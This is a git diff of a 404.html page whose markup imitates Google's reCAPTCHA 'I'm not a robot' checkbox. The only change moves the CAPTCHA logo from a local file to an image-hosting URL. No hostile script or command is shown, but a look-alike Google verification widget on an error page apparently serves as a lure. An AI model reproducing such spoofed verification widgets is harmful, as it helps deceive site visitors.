--- a/404.html
+++ b/404.html
@@ -230,7 +230,7 @@
                 <button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
             </div>
             <p class="im-not-a-robot m-p line-normal">I'm not a robot</p>
-            <img src="reCAPTCHA%20Verification_files/reCAPTCHA-logo@2x.png" class="captcha-logo line-normal" alt="">
+            <img src="https://i.postimg.cc/yNfJ8GZ3/re-CAPTCHA-logo-2x.png" class="captcha-logo line-normal" alt="">
             <br>
             <p class="checkbox-desc m-p line-normal">
             <a href="https://www.google.com/intl/en/policies/privacy/">Privacy</a> - <a href="https://www.google.com/intl/en/policies/terms/">Terms</a>
